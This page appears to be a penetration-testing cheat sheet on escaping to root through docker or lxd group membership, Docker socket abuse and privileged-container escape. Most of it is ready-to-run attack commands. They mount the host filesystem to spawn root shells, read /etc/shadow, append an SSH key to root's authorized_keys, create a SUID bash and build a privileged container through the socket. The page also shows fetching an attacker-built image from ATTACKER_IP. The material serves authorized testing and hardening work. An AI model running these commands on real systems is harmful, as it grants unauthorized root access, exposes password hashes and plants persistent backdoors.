> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Docker / LXD Escape

> Privilege escalation via Docker and LXD group membership: mount host filesystem and escape to root.

## Check Group Membership

```bash theme={"dark"}
id
groups
```

If user is in `docker` or `lxd` group → root escalation possible.

***

## Docker Privesc

### Mount Host Filesystem

```bash theme={"dark"}
docker run -v /:/mnt --rm -it alpine chroot /mnt bash
```

Instant root shell with full host filesystem.

### Alternative Images

```bash theme={"dark"}
docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
docker run -v /:/mnt --rm -it debian chroot /mnt bash
```

### If No Internet (Use Local Image)

```bash theme={"dark"}
docker images
docker run -v /:/mnt --rm -it <IMAGE_ID> chroot /mnt bash
```

### Read Sensitive Files

```bash theme={"dark"}
docker run -v /etc/shadow:/tmp/shadow --rm alpine cat /tmp/shadow
```

### Add SSH Key to Root

```bash theme={"dark"}
docker run -v /root:/mnt --rm -it alpine sh -c 'mkdir -p /mnt/.ssh && echo "ssh-ed25519 AAAA..." >> /mnt/.ssh/authorized_keys'
```

### Create SUID bash

```bash theme={"dark"}
docker run -v /:/mnt --rm -it alpine sh -c 'cp /mnt/bin/bash /mnt/tmp/rootbash && chmod +s /mnt/tmp/rootbash'
```

On host:

```bash theme={"dark"}
/tmp/rootbash -p
```

***

## Docker Socket Abuse

If `/var/run/docker.sock` is accessible:

```bash theme={"dark"}
ls -la /var/run/docker.sock
```

### Via curl

```bash theme={"dark"}
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
```

```bash theme={"dark"}
curl -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"Image":"alpine","Cmd":["/bin/sh"],"HostConfig":{"Binds":["/:/mnt"],"Privileged":true}}' \
  http://localhost/containers/create
```

***

## Docker Escape (From Inside Container)

### Check if Inside Container

```bash theme={"dark"}
cat /proc/1/cgroup | grep docker
ls /.dockerenv
hostname
```

### Privileged Container Escape

```bash theme={"dark"}
# Check if privileged
cat /proc/1/status | grep Cap
# CapEff: 0000003fffffffff = privileged
```

Mount host disk:

```bash theme={"dark"}
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host bash
```

***

## LXD Privesc

### Step 1 — Build Alpine Image (Attacker)

```bash theme={"dark"}
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sudo bash build-alpine
# Creates: alpine-v3.x-x86_64-XXXXXXXX_XXXX.tar.gz
```

### Step 2 — Transfer to Target

```bash theme={"dark"}
python3 -m http.server 80
# On target:
wget http://ATTACKER_IP/alpine-v3.x-x86_64.tar.gz
```

### Step 3 — Import and Create Container

```bash theme={"dark"}
lxc image import alpine-v3.x-x86_64.tar.gz --alias myimage
lxc init myimage privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
```

### Step 4 — Access Host Filesystem

```bash theme={"dark"}
cd /mnt/root
cat etc/shadow
```

### Create SUID bash

```bash theme={"dark"}
cp /mnt/root/bin/bash /mnt/root/tmp/rootbash
chmod +s /mnt/root/tmp/rootbash
```

Exit container, on host:

```bash theme={"dark"}
/tmp/rootbash -p
```

***

## Quick Reference

| Scenario             | Command                                                 |
| -------------------- | ------------------------------------------------------- |
| Docker group         | `docker run -v /:/mnt --rm -it alpine chroot /mnt bash` |
| Docker socket        | Abuse via curl or docker CLI                            |
| Privileged container | `mount /dev/sda1 /mnt && chroot /mnt`                   |
| LXD group            | Import image → mount host → root                        |
